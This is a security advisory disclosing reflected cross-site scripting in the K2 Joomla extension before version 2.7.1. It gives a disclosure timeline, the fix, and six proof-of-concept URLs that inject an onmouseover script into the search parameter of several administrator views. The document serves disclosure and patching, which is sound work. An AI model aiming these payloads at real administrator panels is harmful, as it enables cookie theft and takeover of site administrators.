================================================================
K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
================================================================

Information
--------------------
Name: K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
Affected Software : K2
Affected Versions: < 2.7.1
Vendor Homepage : https://getk2.org/   
http://extensions.joomla.org/extension/k2
Vulnerability Type : Reflected Cross Site Scripting
Severity : Medium
CVE: n/a


Product
--------------------
K2 is a Joomla! extension for content construction, so it allow edit the
content of the Joomla administration panel and the website.


Description
--------------------
The administrator panel of K2 suffers multiple reflected cross site
scripting. An attacker could trick to an administrator to click in a
malicious URL and steal his cookie or redirect to a malicious site to
generate new attack vectors (e.g. launch exploits against his browser).
This XSS just affects to administrators so the range of attacks is
limited but still is being a risk.


Source code fixed:
https://github.com/getk2/k2/commit/c78f929dd3fcd4c55ba614ef8e789b944c30dc8d


Proof of Concept
----------------
PoC:
http://localhost/administrator/index.php?option=com_k2&view=comments&search="
onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=categories&search="
onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=users&search="
onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=extrafields&search="
onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=items&search="
onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=tags&search="
onmouseover="alert(document.domain)"/>




Solution
--------------------
Update to the latest release (2.7.1).

More info:
https://getk2.org/blog/2571-k2-v271-released

https://vel.joomla.org/resolved/1858-k2-2-7-0-xss-cross-site-scripting


Advisory Timeline
--------------------

26/07/2016 - Informed to the Vendor about the issue.
26/07/2016 - Vendor answers me and try to persuade about that the XSS is
not a vulnerability. He said: "Just because you can run a piece of JS
somewhere doesn't mean it's a security issue." WTF
28/07/2016 - Informed to Joomla VEL about the issue.
29/07/2016 - Joomla VEL confirmed and wrote me that the vendor will fix it.
29/07/2016 - Vendor confirms me the vulnerability. LOL
04/08/2016 - Vendor fixed in the latest release.
04/08/2016 - Public disclosure.


Definitely, sometimes a full disclosure is better than a responsible
disclosure.



Credits & Authors
--------------------
Manuel Mancera (@sinkmanu)



Disclaimer
-------------------
All information is provided without warranty. The intent is to provide
information to secure infrastructure and/or systems, not to be able to
attack or damage. Therefore A2Secure shall not be liable for any
director indirect damages that might be caused by using this information.